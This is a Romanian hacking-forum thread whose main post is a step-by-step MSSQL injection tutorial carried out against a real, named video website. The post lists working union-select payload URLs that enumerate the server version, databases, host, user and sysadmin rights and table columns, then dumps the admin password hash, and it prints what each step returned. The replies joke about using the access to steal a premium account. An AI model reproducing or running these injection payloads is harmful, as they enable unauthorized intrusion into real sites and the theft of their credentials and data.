Guest Praetorian Posted June 8, 2009 Report Posted June 8, 2009 (edited) ----------------------------------[ MSSQL INJECTION ]----------------------------------MSSQL nu este la fel de folosit ca MySQL, din aceasta cauza nu prea multi stiu sa faca MSSQL Injection.Pe cand cautam un SQL intr-un site de gay, am dat din gresela de unul vulnerabil la MSSQL Inj am zis sa fac un tutorial, ca poate o sa prinda bine la multi!Puteti citi mai multe despre MSSQL aici:http://en.wikipedia.org/wiki/Microsoft_SQL_Server----------------------------------[ Numarul Coloanelor ]----------------------------------Folosim ca si la MySQL order by *--Numarul de coloane = 26Coloana vizibila este = 9----------------------------------[ Versiunea ]----------------------------------Se afla la fel ca cel de la MySQL cu @@version, dar nu si cu version().http://503.archive-gay.com/deta.htm?idvideo=-2077+union+all+select+1,2,3,4,5,6,7,8,@@version,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--@@version = Microsoft SQL Server 2005 - 9.00.3077.00 (Intel X86) Dec 17 2008 15:19:45 Copyright © 1988-2005 Microsoft Corporation Workgroup Edition on Windows NT 5.2 (Build 3790: Service Pack 2)----------------------------------[ Baza/bazele de date ]----------------------------------Puteti afla numele bazei de date principala cu db_name().Daca vreti sa vedeti ce baze de date mai are folositi db_name(nr), unde nr va fi numarul bazei de date, de ex: nr=1,2,3 etcBaza de date principala este selft:http://503.archive-gay.com/deta.htm?idvideo=-2077+union+all+select+1,2,3,4,5,6,7,8,db_name(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--Total 6 baze de date: db_name(1) = masterdb_name(2) = tempdbdb_name(3) = modeldb_name(4) = msdbdb_name(5) = id3confdb_name(6) = selft----------------------------------[ Numele Host-ului ]----------------------------------Puteti sa aflati numele cu ajutorul lui host_name()http://503.archive-gay.com/deta.htm?idvideo=-2077+union+all+select+1,2,3,4,5,6,7,8,host_name(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26------------------------------------[ User-ul principal ]----------------------------------Il putem afla usor inlocuind coloana vizibila cu user_name() sau user.http://503.archive-gay.com/deta.htm?idvideo=-2077+union+all+select+1,2,3,4,5,6,7,8,user_name(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26------------------------------------[ Cum verifici daca admin-ul are privilegi de SA ]----------------------------------Este usor si aici, nu trebuie decat sa punem is_srvrolemember('sysadmin','sa')http://503.archive-gay.com/deta.htm?idvideo=-2077+union+all+select+1,2,3,4,5,6,7,8,is_srvrolemember('sysadmin','sa'),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--Daca va returna 1 inseamna ca admin-ul are privilegi de SA [system Administrator], in caz contrar va returna 0.In caz ca nu merge cu is_srvrolemember('sysadmin','sa') inlocuiti sysadmin cu bulkadmin.Mai multe despre SA puteti citi aici:http://en.wikipedia.org/wiki/System_administrator----------------------------------[ Cum sa vezi coloanele unui tabel ]----------------------------------Sintaxa este www.site.com/...?id=-1+union+all+select+*,name,*+from+syscolumns--http://503.archive-gay.com/deta.htm?idvideo=-2077+union+all+select+1,2,3,4,5,6,7,8,name,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+syscolumns--Daca doriti sa vedeti coloanele unei anumite baze de date folositi sintaxa:www.site.com/...?id=-1+union+all+select+*,master..syscolumns.name,*+from+master..syscolumns--Inlocuiti name cu numele tabelului din care vreti sa aflati coloanele.http://503.archive-gay.com/deta.htm?idvideo=-2077+union+all+select+1,2,3,4,5,6,7,8,master..syscolumns.xtype,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+FROM+master..syscolumns------------------------------------[ Cum sa obtii Hash-ul Adminului ]----------------------------------Sintaxa este simpla: www.site.com/...?id=-1 union all select *,password_hash,* from master.sys.sql_logins--Hash-urile in MSSQL 2000/2005 sunt cryptate in SHA1, care au 40 de charactere.http://503.archive-gay.com/deta.htm?idvideo=-2077+union+all+select+1,2,3,4,5,6,7,8,password_hash,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+master.sys.sql_logins--Din cate vedeti nu apare, asa ca ne uitam in sursa.Si vedem 1na1nb1ne1nf1ng1nh1va1vb1lalb1og1oh1cz1 [ care are 40 charactere = SHA1 ]----------------------------------[ Cele mai intalnite baze de date ]----------------------------------Aceste baze de date sunt cele mai des intalnite:northwindmodelmsdbpubstempdbCam atat deocamdata, imi e lene sa mai continui, poate o sa mai adaug si alte lucruri altadata.Writted by TinKode @ Insecurity.ro Edited October 6, 2009 by Praetorian Quote
M4T3! Posted July 26, 2009 Report Posted July 26, 2009 O intrebare: De unde stiu ca siteul este vulnerabil mssql? Imi dau seama din versiune, care este Microsoft sql server....? Quote
Guest Praetorian Posted October 6, 2009 Report Posted October 6, 2009 Iti da-i seama din eroare. Quote
ZeroCold Posted October 7, 2009 Report Posted October 7, 2009 bun tutorialu...Pe cand cautam un SQL intr-un site de gay....Vroiai cont premium :D:D ? Quote
UnD3rGr0uNd Posted October 7, 2009 Report Posted October 7, 2009 Bunicel tut:)...a si 1-0 pt ZeroCold:)) Quote
dRuNNNk Posted October 11, 2009 Report Posted October 11, 2009 bun tutorialu...Vroiai cont premium :D:D ?da de ce ai sa ne dai tu? XD Quote
bucifala Posted October 24, 2009 Report Posted October 24, 2009 si pana la urma ce face musca asta? :S Quote
Nytro Posted October 24, 2009 Report Posted October 24, 2009 si pana la urma ce face musca asta? :SBan permanent, spam. Parca ii mai dadusem o data sau de doua ori ban... Quote
